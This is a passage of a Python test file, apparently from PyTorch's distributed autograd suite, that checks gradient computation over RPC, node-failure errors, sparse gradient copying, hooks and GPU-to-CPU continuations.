"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
                # Mark rank 0 as done in the store, since the RPC framework on
                # some nodes might be broken at this point (listenLoop() in
                # ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.linalg.multi_dot([t1, t2, t3, t4, res])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.linalg.multi_dot([t1, t2, t3, t4, res]).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
            # Need at least one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
        # Only `num_current_backward_passes` and `num_autograd_contexts` are present.
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
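            # t1.grad and t2.grad now hold gradients accumulated over two local
            # backward passes; the dist autograd backward below also runs twice,
            # so the grads recorded in the context should match them exactly.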
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
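        # The saved data_ptr() lets the test tell whether dist autograd reused
        # the gradient buffer produced by backward() (pointers match) or had to
        # clone it (pointers differ).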
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
            # Check that a and b use different grad buffers.
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
                # Create a sparse tensor with non-contiguous indices and values
                # and return it as the grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
        # Non-contiguous indices and values; this should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
            # Check that a and b use different grad buffers.
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
class CudaDistAutogradTest(CommonDistAutogradTest):
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
            # Root is GPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Test that in dist autograd, when tensors communicated over RPC do
        # NOT require grad, we still clean up the dist autograd contexts
        # created on other nodes. This is because the autograd context is
        # still communicated over RPC even if the tensor arguments do not
        # require grad, since it is possible that the response could.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
